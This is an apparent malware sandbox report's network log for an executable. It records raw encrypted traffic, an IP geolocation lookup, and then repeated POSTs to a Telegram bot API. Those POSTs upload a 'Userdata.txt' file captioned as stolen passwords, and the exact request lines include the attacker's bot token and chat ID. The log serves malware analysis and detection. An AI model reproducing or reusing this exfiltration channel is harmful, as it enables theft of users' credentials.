                                                                                                            2025-01-10 20:53:26 UTC4818INData Raw: 04 8d ef 2a 52 13 84 2c c0 4a c2 6a c3 5b f5 89 e9 0a bd 0c 37 05 fe 30 d0 89 4b cf eb 10 32 34 34 04 9d f3 1d f8 a6 02 47 06 c2 b6 f6 1c 7f fe dc db 13 92 06 a6 79 f2 87 52 8c 79 91 34 42 98 d0 76 89 f2 38 17 91 8c 22 22 81 a3 d5 59 31 37 3f d6 3f 8d c1 6f 67 14 10 5f 0e 77 aa c9 a5 5e a7 f2 0f 53 4d b1 ea a0 dd 63 3d 98 71 34 8b a8 ec b8 f6 fb 7a ad 3f 98 1b b4 bc d8 0f 58 9f 8c ef 5f e7 bb 18 52 4c 80 ca c6 1d 2e 97 4d a6 e0 98 e1 e5 89 a4 8a da b3 5a 09 cb a2 f5 67 d4 fe f4 46 e1 f8 f1 1c 22 d9 77 9a f9 b1 d8 3c 3a fe 72 26 35 a9 b9 53 48 c4 e9 1b ee c3 5c 3c 79 b6 25 a1 a2 76 e7 8a 09 76 15 58 60 61 41 7e 21 f9 e5 86 5f b7 aa 9e 21 11 d8 f6 0b 2e 56 98 8e 9a 86 02 42 ab 7f ef a7 3e 54 ad 1a 6f 29 6e c3 5d 0a 72 a6 54 85 95 d9 7a cb fe 2e 6f 25 12 10
                                                                                                            Data Ascii: *R,Jj[70K244GyRy4Bv8""Y17??og_w^SMc=q4z?X_RL.MZgF"w<:r&5SH\<y%vvX`aA~!_!.VB>To)n]rTz.o%
                                                                                                            2025-01-10 20:53:26 UTC1323INData Raw: d8 75 40 1b a6 b6 30 01 07 6d 8e 2a 19 26 76 0e 25 c5 43 84 c4 22 81 46 21 18 13 94 6e 94 b8 ca de 46 7c 60 a8 03 a6 27 f2 95 f6 f3 20 34 9b 3d 55 30 bc ab fd ed cc 80 71 0e 94 ed f1 b6 0a ec 56 48 7f 8f e4 4b 8f a5 4d 7f 62 b7 14 ca 6a ea b3 30 26 26 b5 95 46 c8 74 c8 9a a2 47 5c 35 98 fc af fb 41 e4 5c a4 a4 e9 f3 c5 63 f0 81 18 5e 99 67 9a 5e 6e 7f a7 6b 0b 1f 05 59 65 bf ed 75 05 a0 ca c2 e2 71 b7 4c bd 02 b7 fc 03 42 5d 73 14 20 67 fd 44 79 ca f4 79 1f 13 dd 11 25 38 5b a2 d6 37 9a fe 56 53 58 ce 19 5e e3 30 24 46 d5 f1 bf 16 25 25 b4 5a 01 f8 a9 7a 2d 84 36 0f 15 8c c5 e9 80 e2 dd 0b 6e d1 c9 a2 40 6e 0f 33 64 e8 16 7f 6b e7 22 2e 2a 6d d9 9c 3f 70 a3 54 a6 6c e0 c8 a8 c5 dd 48 88 9e 56 a9 59 bd cd 5b 88 81 87 54 9b 4b 39 12 c0 b1 cf 2b 07 42 75 d5
                                                                                                            Data Ascii: u@0m*&v%C"F!nF|`' 4=U0qVHKMbj0&&FtG\5A\c^g^nkYeuqLB]s gDyy%8[7VSX^0$F%%Zz-6n@n3dk".*m?pTlHVY[TK9+Bu
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: ce 73 a0 44 b2 64 23 c0 23 26 85 fb 1c 35 2a e3 3e 17 c1 f6 42 8b 6c c4 1a 7e 5a 1f 92 82 10 f1 08 43 3a 5d ee 90 10 28 fa ca 21 00 43 52 89 09 d6 a9 6d 50 ca e5 fc f3 60 d0 c4 ff f2 9b e8 25 df 5f 76 ce 6e 8e 16 33 ba be 4d 02 32 01 29 cf b8 1a 56 11 b6 1f 6b f5 77 e9 f1 40 b5 d6 8a f8 b0 b5 61 93 9d 60 d2 ef cf 6c a8 cc 66 06 a6 cc 9b 0c 82 db 7f 8b e8 8d 5d 30 74 69 9d d3 d0 0a 57 e1 74 00 a4 94 11 7a aa 0f 05 6c fc bf 93 7d f1 d3 ba 4f 3c 2c 65 d4 56 d4 26 28 23 b6 f1 8c 83 2f 7a a7 08 47 37 a9 ad f9 46 8f 7b f7 c8 f6 3d 2e f7 a1 fc d9 c3 53 b8 4f bd 66 ef e2 86 f5 d9 73 28 57 7d 8d f0 64 36 d5 44 ff 1a da 8d 81 e0 6b 6e d5 05 81 83 24 a3 d8 92 8b 0f df 9e aa 89 e1 99 19 6f 1b d3 17 a7 d7 e6 86 2c 29 b3 ba 27 02 e7 ef 06 b6 0b 18 12 d7 5b 07 d4 68 43
                                                                                                            Data Ascii: sDd##&5*>Bl~ZC:](!CRmP`%_vn3M2)Vkw@a`lf]0tiWtzl}O<,eV&(#/zG7F{=.SOfs(W}d6Dkn$o,)'[hC
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: 7b a4 cd de 9c ab fe b7 73 5d 7c 37 1d 57 15 1b 51 ed 9d 1f 3d 3d 2a 64 68 eb db d8 da 7f 28 26 7d db 75 f5 1e 6c 41 f2 4b c2 78 12 e2 68 23 90 54 37 d8 71 d3 2a 21 01 70 4c b9 e3 a5 5d 23 ae 69 be e5 ae 06 db 29 e0 5a 91 64 b3 42 0d e8 c1 9b fe ef db 67 98 91 8a d9 8d 74 71 3a 9d a5 92 73 6a 2b 8c 1c 06 c8 43 6f c7 d3 d9 00 9b de 5b ec 52 b3 ed 52 90 12 12 4b 7c a8 eb f0 54 74 19 03 ee b4 c9 70 c2 1b a1 3c b1 6a 9e 4b 05 5d a7 ad e8 6d 3a e2 c3 48 03 0e 1d 10 d7 a9 b4 73 28 f6 67 72 da 64 73 2c 54 0a 1b 15 93 00 0b cf 4a 0e 5e a2 be 33 f4 d5 78 92 59 ee 00 6c 3a e3 ac 53 4a e1 0d 83 9b cb 68 5d 32 8b 4f 66 23 a5 18 ac 13 66 03 f8 41 94 4e 46 0a ca 12 c7 60 70 48 00 6d e8 70 4c bd 50 11 08 04 9d 67 1f 92 f3 7e a9 74 e2 ed 1b 41 be f2 7d be 52 45 72 70 86
                                                                                                            Data Ascii: {s]|7WQ==*dh(&}ulAKxh#T7q*!pL]#i)ZdBgtq:sj+Co[RRK|Ttp<jK]m:Hs(grds,TJ^3xYl:SJh]2Of#fANF`pHmpLPg~tA}RErp
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: 08 48 ce f3 87 15 34 35 92 7c 03 85 cb 7a 2d 9b 2e da 15 9e ce e9 80 d3 df 70 33 d1 cb d4 f6 26 0f 43 46 8e 42 7f 61 e6 39 aa 60 6a c8 9a 1f 7a 89 d7 ea 6c ea da 7e 17 d0 41 91 9b 47 ac 5f b4 d9 53 bc 8b bf a3 9a 4b 39 37 b2 53 c5 2b 75 22 3b 2c 68 0a 14 11 87 2e 35 d9 f6 4d c2 bb ba f7 0c 88 24 4f 7e c1 3b 33 ae 1c 9a cd 4a 78 06 16 ed 0a 7f ce 32 16 d8 72 30 8a ba 90 14 5c 67 0d 27 b5 e2 09 05 5b 6b 19 ec a7 a6 0a be e8 7a 52 39 78 e6 15 5f 5a 8e 20 15 63 53 55 64 ec 2a 19 fd a6 a1 2a cb eb e1 08 a6 75 7d 32 4a 68 d3 29 84 d1 24 f3 7c 39 9a 97 ea d6 cd 50 fe 84 18 4e 84 2a 99 90 70 ba d5 76 cc ac 66 36 aa 5c 6f 7a 80 d2 ee 2f 4b 5f 6c 0d 25 df f0 de b9 09 58 2f d5 87 4f 4c b5 a9 ec 8d 83 d8 7b 78 c1 f6 e8 b0 f2 eb 90 10 06 9d b9 a4 de d2 2f 45 ae 45 2d
                                                                                                            Data Ascii: H45|z-.p3&CFBa9`jzl~AG_SK97S+u";,h.5M$O~;3Jx2r0\g'[kzR9x_Z cSUd**u}2Jh)$|9PN*pvf6\oz/K_l%X/OL{x/EE-
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: 27 36 88 30 07 ad 31 be 37 b2 24 d9 d4 5b 49 a3 77 02 20 1c 1c ae a0 78 b8 63 9d a1 2d 72 90 d9 81 da ec e9 64 b8 23 c2 c8 0a 93 f1 da 73 fb 67 05 b9 19 75 4f 29 38 01 ee b2 00 ee e1 97 3c 8c 88 54 2a 4e 25 df 43 28 54 9d db ae 1f 1b 80 f0 56 77 28 81 64 5f e6 84 db 86 94 56 3d e4 28 41 2d 4a fd b2 18 4e 18 8f 0e d5 60 09 8d 89 63 9f bf 74 ab 30 71 73 2d d6 28 8e d2 20 6a 3b 14 33 17 28 92 8b c5 b8 d8 72 cf 1f 45 6f c8 83 c1 0d 50 b5 0a d6 bc 30 25 a1 ea 6c cd 36 9b ab 41 4c 0b 26 fa 6c bb 24 cd 13 8d 35 f1 fd 35 d5 52 62 a1 17 e2 56 3e f0 b9 c0 5b 4f 12 e4 d9 38 84 1d 48 ba 0a 9a 9a 1d 64 a5 c6 37 32 13 bd a8 c1 a5 d1 c7 d9 b5 4b 60 29 d2 ba 17 ff 3e be 14 28 89 80 cc 55 8c f3 23 3b 28 35 9c c6 de d9 e7 eb 82 ad 61 d6 87 1c 4c e5 5d 03 bb 4b 5a 1e 87 a8
                                                                                                            Data Ascii: '6017$[Iw xc-rd#sguO)8<T*N%C(TVw(d_V=(A-JN`ct0qs-( j;3(rEoP0%l6AL&l$55RbV>[O8Hd72K`)>(U#;(5aL]KZ
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: ac 6f f4 d3 fa a3 bb f4 1e a5 63 5c 48 41 02 27 19 31 cb ec 2d b9 9e ac fa f9 6b a2 be ef 7b b8 50 49 43 80 01 ea aa 03 9b d4 20 a8 a7 ac 6f 83 b9 b8 4d 94 0c b2 1d fd 05 9b f7 96 c4 ca 4f a1 b6 3e e8 f5 29 5b ed 92 f8 9f 83 3c 4e 39 e8 84 d4 9a cf d3 e4 8e 8e 5e 5f 03 ff 79 3b 5b 6b fd f1 4e 23 ab 8f 9c 5b ff 83 c8 d9 cb 0c 31 1c fb 4e d3 8d 39 29 c6 9b 42 22 16 85 43 ff 17 e7 74 06 5f 6c b1 54 f3 16 0f 34 2a 49 36 ba 3f b0 87 fb cb 45 80 40 cf 18 0f 8f 80 5e 8b f2 39 32 87 fe ba 2e 81 d3 73 0e 70 35 9d 83 31 d7 6c 7a 67 6e a4 84 16 75 ab 7a 85 7d ce b5 1a 53 3d 60 43 bb cc 6c 8c bb 7c 40 db 96 ec c8 50 a0 57 ad 3f 98 67 37 c2 d7 05 58 8a 9b 8d f8 a9 bb 12 26 ed 8f ca c2 76 be 97 5c ab f7 5f f4 ca 09 a3 9b d6 ff ca fc 34 2d dd 51 0a ee d7 01 ef f8 f1 1c
                                                                                                            Data Ascii: oc\HA'1-k{PIC oMO>)[<N9^_y;[kN#[1N9)B"Ct_lT4*I6?E@^92.sp51lzgnuz}S=`Cl|@PW?g7X&v\_4-Q
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: cc 73 93 01 09 ef 5b b0 d9 b6 2f 45 c8 45 2d 26 a0 2e 6a 28 e3 9a 9e 8b 7c 7b e2 a8 6e c7 c9 ca e5 a5 6f af c5 69 7e f1 9b 60 5d 9f a8 96 3a 61 df ad a2 f8 4e 59 ad 99 24 d2 bc 1d 19 d6 c9 12 cd 4c 2b 05 9b 59 ae 15 fb 02 92 9b 75 ca 6b bc 13 51 6a d1 eb a9 b1 a8 85 0e a2 c4 c1 3e 86 73 f7 a1 98 1c fe 98 0c ca 55 e4 60 7d bd 0f fc 7d 9c b1 d9 4f 26 a2 3b 15 a4 f7 32 4d 78 e5 45 a8 8b 38 7d dd bc eb 06 3b 47 a4 4e 60 5d 5e a9 6a 86 0e 4a 75 e3 d6 5d 57 6b 03 0b 3f 7e 41 2b 66 4a bd 00 c7 61 ad 1b 0c 13 47 a3 75 e6 32 a3 b4 cc c9 24 aa e4 4d 3f d2 78 1c c3 29 2a c6 59 00 22 91 de 88 b9 81 2a 3f 53 e0 9b 63 5b 72 7c 58 98 64 88 b5 1f cb ac 0e a5 c5 fd 3a ee 14 eb 0b ab c2 01 da 59 06 9b bc 0f 79 04 db f3 2c 8b 4b 07 9f 5a 7f 7a 9f 03 4e be 51 b3 70 65 dc 9b
                                                                                                            Data Ascii: s[/EE-&.j(|{noi~`]:aNY$L+YukQj>sU`}}O&;2MxE8};GN`]^jJu]Wk?~A+fJaGu2$M?x)*Y"*?Sc[r|Xd:Yy,KZzNQpe
                                                                                                            2025-01-10 20:53:26 UTC1390INData Raw: b0 64 fe c4 18 3e 0d 86 03 cb 77 33 83 87 a8 b4 8b 55 79 55 0b 0a bf 12 02 6c 26 b0 0c da 1a c7 ad c8 44 b9 38 c0 27 1f c4 6c 2d 93 51 e6 3b 9e 54 74 1c 3d b8 b2 6e 55 3f 74 6e 85 5d 37 47 61 ba 0f 28 3d 3a 57 8f 59 df 2c bc 78 db 84 7c a1 1f fa 46 24 b1 e8 f5 9a 7a 39 0c 98 13 19 3a 27 56 89 a4 6b 51 ae ff 0a 7c 88 84 8d bc b5 8c 53 a9 08 6e 9f 71 4a db 7a aa 6e 76 e4 c9 a5 bf 1f 59 65 05 60 27 bf e1 d4 a4 42 32 ff 23 ec b4 2d d9 66 46 13 71 13 13 4b 50 62 56 3c 09 08 f7 b0 0e 32 da 64 47 71 e8 9e a3 05 2f ba 9d 22 02 53 10 4d 23 e9 45 93 c6 53 a4 42 20 1c 1b 80 20 95 b8 c4 de 00 7c 60 a4 10 ad 33 75 e8 75 bf 33 3e 8e 35 41 b5 f0 b8 f6 f8 ef 7d 67 26 34 90 bd bc 1b ed 39 17 55 8f ee 5a 95 bd da 7f f8 b1 07 cf 4e ea b3 0a 06 24 e6 79 46 c8 7a be d8 a5 35
                                                                                                            Data Ascii: d>w3UyUl&D8'l-Q;Tt=nU?tn]7Ga(=:WY,x|F$z9:'VkQ|SnqJznvYe`'B2#-fFqKPbV<2dGq/"SM#ESB |`3uu3>5A}g&49UZN$yFz5


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.549871104.21.16.14432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:29 UTC871INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:29 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1857198
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQMuZ%2Bm%2BNjQ5AZiYMD7TWeIZAjV1DJLh8DcC%2B1E%2FAUmsWoGOgjkS4QCY8K1Aa9nRQ9ceg%2BVDVmAd9SV7qG9RkuA%2B%2FRAOYjLRuzr%2BQWoVEO3ARKR5pwXdqUQPcHcK%2FZ%2BgZ479v%2Bd2"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8fff8e8a0c9d1899-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1632&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=153&unsent_bytes=0&cid=f81fb455e0ff5de8&ts=167&x=0"
                                                                                                            2025-01-10 20:53:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.549912149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:35 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd318ef030315c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 65 66 30 33 30 33 31 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd318ef030315cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:35 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:35 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44727,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542415,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.549924149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:37 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31a3dcc4e99c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 33 64 63 63 34 65 39 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31a3dcc4e99cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:37 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:37 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:37 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44728,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542417,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.549939149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:39 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31ba1ce8ae90
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 61 31 63 65 38 61 65 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31ba1ce8ae90Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:39 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:39 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:39 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44729,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542419,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
